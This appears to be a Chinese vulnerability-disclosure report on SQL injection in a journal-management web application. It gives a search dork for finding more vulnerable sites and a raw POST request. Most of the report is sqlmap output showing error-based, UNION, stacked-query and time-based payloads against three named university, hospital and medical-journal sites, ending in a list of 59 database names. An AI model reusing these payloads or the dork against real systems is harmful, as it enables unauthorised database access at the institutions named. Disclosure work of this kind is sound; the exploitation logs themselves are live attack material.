### 简要描述: 没有证明到数据库就不给通过啊~~好吧重新提交下 ### 详细说明: http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id= 这里搜索到很多。随便找几个测试下: POST /web/keysearch.aspx HTTP/1.1 Host: www.XXXX.com User-Agent: Baiduspider Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: cck_lasttime=1410760097025; cck_count=0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 95 author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf ### 漏洞证明: 案例一:湖南大学 http://dxjykx.cnmanu.cn/ sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: author Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105 )+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE...
### 简要描述: 没有证明到数据库就不给通过啊~~好吧重新提交下 ### 详细说明: http://74.125.111.99/search?q=inurl:Web/CommonPage.aspx?Id= 这里搜索到很多。随便找几个测试下: POST /web/keysearch.aspx HTTP/1.1 Host: www.XXXX.com User-Agent: Baiduspider Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: cck_lasttime=1410760097025; cck_count=0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 95 author=1&butSearch=%e6%9f%a5%e8%af%a2&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf ### 漏洞证明: 案例一:湖南大学 http://dxjykx.cnmanu.cn/ sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: author Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1%' AND 9293=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105 )+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (9293=9293) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&butSearch=??&ke yword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(1 09)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(100)+CHAR(74)+CHAR(79)+CHAR(71)+CHAR(115)+ CHAR(88)+CHAR(77)+CHAR(80)+CHAR(88)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(11 7)+CHAR(58), NULL-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state =&title=wolf Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2& Nian=2016&operat=&Qi=1&state=&title=wolf Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&N ian=2016&operat=&Qi=1&state=&title=wolf Place: POST Parameter: keyword Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1&butSearch=??&keyword=assd%' AND 4223=CONVERT(INT,(SELECT C HAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+(SELECT (CASE WHEN (4223=4223) TH EN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf Type: UNION query Title: Generic UNION query (78) - 6 columns Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 78, 78, 78, 7 8, 78, CHAR(58)+CHAR(109)+CHAR(105)+CHAR(112)+CHAR(58)+CHAR(75)+CHAR(90)+CHAR(88 )+CHAR(113)+CHAR(110)+CHAR(103)+CHAR(76)+CHAR(85)+CHAR(80)+CHAR(114)+CHAR(58)+CH AR(115)+CHAR(97)+CHAR(117)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&title= wolf Place: POST Parameter: title Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat e=&title=wolf%' AND 4163=CONVERT(INT,(SELECT CHAR(58)+CHAR(109)+CHAR(105)+CHAR(1 12)+CHAR(58)+(SELECT (CASE WHEN (4163=4163) THEN CHAR(49) ELSE CHAR(48) END))+CH AR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58))) AND '%'=' Type: UNION query Title: Generic UNION query (78) - 6 columns Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat e=&title=wolf%' UNION ALL SELECT 78, 78, 78, 78, CHAR(58)+CHAR(109)+CHAR(105)+CH AR(112)+CHAR(58)+CHAR(108)+CHAR(97)+CHAR(79)+CHAR(74)+CHAR(71)+CHAR(110)+CHAR(69 )+CHAR(116)+CHAR(108)+CHAR(82)+CHAR(58)+CHAR(115)+CHAR(97)+CHAR(117)+CHAR(58), 7 8-- --- there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: author, type: Single quoted string (default) [1] place: POST, parameter: title, type: Single quoted string [2] place: POST, parameter: keyword, type: Single quoted string [q] Quit > [13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2000 [13:41:08] [INFO] testing if current user is DBA current user is DBA: False [13:41:08] [INFO] fetching database names [13:41:08] [INFO] the SQL query used returns 59 entries available databases [59]: [*] bl [*] cdxxgc [*] cg [*] cghy [*] cy [*] cymx [*] d1 [*] demcom [*] demo [*] dj [*] dxjykx [*] Eye [*] gjzhyx [*] GuaHao [*] hh [*] hhzrkx [*] hlgl [*] hnxbyx [*] hxyqdz [*] j4e [*] jjyx [*] lcjsyx [*] lcjyzzs [*] lcsjbx [*] lcsjwk [*] lnyxybj [*] main [*] master [*] mfskin [*] model [*] mrzxwk [*] msdb [*] mz [*] mzyfs [*] njsd [*] nky [*] Northwind [*] nxgb [*] nydxxb [*] pifu [*] pubs [*] rfic [*] SMS [*] st [*] sypfb [*] tempdb [*] test [*] wcbx [*] wf [*] wlxb [*] xdx [*] xhnj [*] xjyx [*] xnxyxb [*] yxjz [*] zdblx [*] zjyx [*] zr [*] zxyjh [13:41:08] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\ output\dxjykx.cnmanu.cn' [*] shutting down at 13:41:08 案例二:上海交通大学医学院附属仁济医院 http://www.cjge-manuscriptcentral.com D:\Python27\sqlmap>sqlmap.py -r 1.txt --dbs sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 13:25:16 [13:25:16] [INFO] parsing HTTP request from '1.txt' [13:25:16] [INFO] using 'D:\Python27\sqlmap\output\www.cjge-manuscriptcentral.co m\session' as session file [13:25:16] [INFO] resuming injection data from session file [13:25:16] [INFO] resuming back-end DBMS 'microsoft sql server 2000' from sessio n file [13:25:16] [INFO] testing connection to the target url sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: author Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: author=1'; WAITFOR DELAY '0:0:5';-- AND 'enfS'='enfS&butSearch=查询 &keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr. Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: author=1' WAITFOR DELAY '0:0:5'-- AND 'ExWQ'='ExWQ&butSearch=查询&k eyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=Mr. --- [13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2000 [13:25:17] [INFO] fetching database names [13:25:17] [INFO] fetching number of databases [13:25:17] [WARNING] time-based comparison needs larger statistical model. Makin g a few dummy requests, please wait.. 59 [13:25:47] [INFO] retrieved: [13:25:52] [WARNING] adjusting time delay to 1 second bl [13:26:33] [INFO] retrieved: cdxxgc [13:27:12] [INFO] retrieved: cg [13:27:25] [INFO] retrieved: cghy [13:27:51] [INFO] retrieved: cy [13:28:03] [INFO] retrieved: cymx [13:28:30] [INFO] retrieved: d1 [13:28:42] [INFO] retrieved: demcom [13:29:18] [INFO] retrieved: demo [13:29:44] [INFO] retrieved: dj [13:29:58] [INFO] retrieved: dxjykx [13:30:39] [INFO] retrieved: Eye [13:30:56] [INFO] retrieved: gjzhyx [13:31:38] [INFO] retrieved: GuaHao [13:32:13] [INFO] retrieved: hh [13:32:30] [INFO] retrieved: hhzrkx [13:33:13] [INFO] retrieved: hlgl [13:33:43] [INFO] retrieved: hnxbyx [13:34:26] [INFO] retrieved: hxyqdz [13:35:07] [INFO] retrieved: j4e [13:35:27] [INFO] retrieved: jjyx [13:35:55] [INFO] retrieved: lcjsyx [13:36:35] [INFO] retrieved: lcjyzzs [13:37:23] [INFO] retrieved: lcsjbx 没有检测完,就证明下漏洞能够获取到数据库信息即可了吧! 案例三:中国美容整形外科杂志 mr.cnmanu.cn sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: POST Parameter: title Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat e=&title=wolf%' AND 7683=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119)+CHAR(1 14)+CHAR(58)+(SELECT (CASE WHEN (7683=7683) THEN CHAR(49) ELSE CHAR(48) END))+CH AR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'=' Type: UNION query Title: Generic UNION query (41) - 6 columns Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat e=&title=wolf%' UNION ALL SELECT 41, 41, 41, 41, CHAR(58)+CHAR(104)+CHAR(119)+CH AR(114)+CHAR(58)+CHAR(76)+CHAR(69)+CHAR(116)+CHAR(66)+CHAR(113)+CHAR(78)+CHAR(71 )+CHAR(76)+CHAR(75)+CHAR(98)+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58), 41 -- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat e=&title=wolf%'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: author=1&butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&stat e=&title=wolf%' WAITFOR DELAY '0:0:5'-- Place: POST Parameter: keyword Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1&butSearch=??&keyword=assd%' AND 2981=CONVERT(INT,(SELECT C HAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (2981=2981) TH EN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58)) ) AND '%'='&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf Type: UNION query Title: Generic UNION query (41) - 6 columns Payload: author=1&butSearch=??&keyword=assd%' UNION ALL SELECT 41, 41, 41, 4 1, 41, CHAR(58)+CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(122)+CHAR(72)+CHAR(1 05)+CHAR(70)+CHAR(111)+CHAR(73)+CHAR(83)+CHAR(98)+CHAR(117)+CHAR(100)+CHAR(58)+C HAR(110)+CHAR(119)+CHAR(116)+CHAR(58)-- &Lm=2&Nian=2016&operat=&Qi=1&state=&titl e=wolf Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: author=1&butSearch=??&keyword=assd%'; WAITFOR DELAY '0:0:5'--&Lm=2& Nian=2016&operat=&Qi=1&state=&title=wolf Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: author=1&butSearch=??&keyword=assd%' WAITFOR DELAY '0:0:5'--&Lm=2&N ian=2016&operat=&Qi=1&state=&title=wolf Place: POST Parameter: author Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: author=1%' AND 6529=CONVERT(INT,(SELECT CHAR(58)+CHAR(104)+CHAR(119 )+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (6529=6529) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(110)+CHAR(119)+CHAR(116)+CHAR(58))) AND '%'='&butSearch=??&k eyword=assd&Lm=2&Nian=2016&operat=&Qi=1&state=&title=wolf Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: author=1%' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHAR(58)+ CHAR(104)+CHAR(119)+CHAR(114)+CHAR(58)+CHAR(119)+CHAR(119)+CHAR(101)+CHAR(76)+CH AR(87)+CHAR(114)+CHAR(81)+CHAR(75)+CHAR(70)+CHAR(71)+CHAR(58)+CHAR(110)+CHAR(119 )+CHAR(116)+CHAR(58)-- &butSearch=??&keyword=assd&Lm=2&Nian=2016&operat=&Qi=1&st ate=&title=wolf Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: author=1%'; WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2& Nian=2016&operat=&Qi=1&state=&title=wolf Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: author=1%' WAITFOR DELAY '0:0:5'--&butSearch=??&keyword=assd&Lm=2&N ian=2016&operat=&Qi=1&state=&title=wolf --- there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: author, type: Single quoted string (default) [1] place: POST, parameter: title, type: Single quoted string [2] place: POST, parameter: keyword, type: Single quoted string [q] Quit > [13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: Microsoft SQL Server 2000 [13:40:55] [INFO] testing if current user is DBA current user is DBA: False [13:40:55] [INFO] fetching database names [13:40:55] [INFO] the SQL query used returns 59 entries available databases [59]: [*] bl [*] cdxxgc [*] cg [*] cghy [*] cy [*] cymx [*] d1 [*] demcom [*] demo [*] dj [*] dxjykx [*] Eye [*] gjzhyx [*] GuaHao [*] hh [*] hhzrkx [*] hlgl [*] hnxbyx [*] hxyqdz [*] j4e [*] jjyx [*] lcjsyx [*] lcjyzzs [*] lcsjbx [*] lcsjwk [*] lnyxybj [*] main [*] master [*] mfskin [*] model [*] mrzxwk [*] msdb [*] mz [*] mzyfs [*] njsd [*] nky [*] Northwind [*] nxgb [*] nydxxb [*] pifu [*] pubs [*] rfic [*] SMS [*] st [*] sypfb [*] tempdb [*] test [*] wcbx [*] wf [*] wlxb [*] xdx [*] xhnj [*] xjyx [*] xnxyxb [*] yxjz [*] zdblx [*] zjyx [*] zr [*] zxyjh [13:40:55] [INFO] fetched data logged to text files under 'I:\????\SQLMAP~1\Bin\ output\mr.cnmanu.cn' [*] shutting down at 13:40:55 审核的大牛这样可以了吧~~~
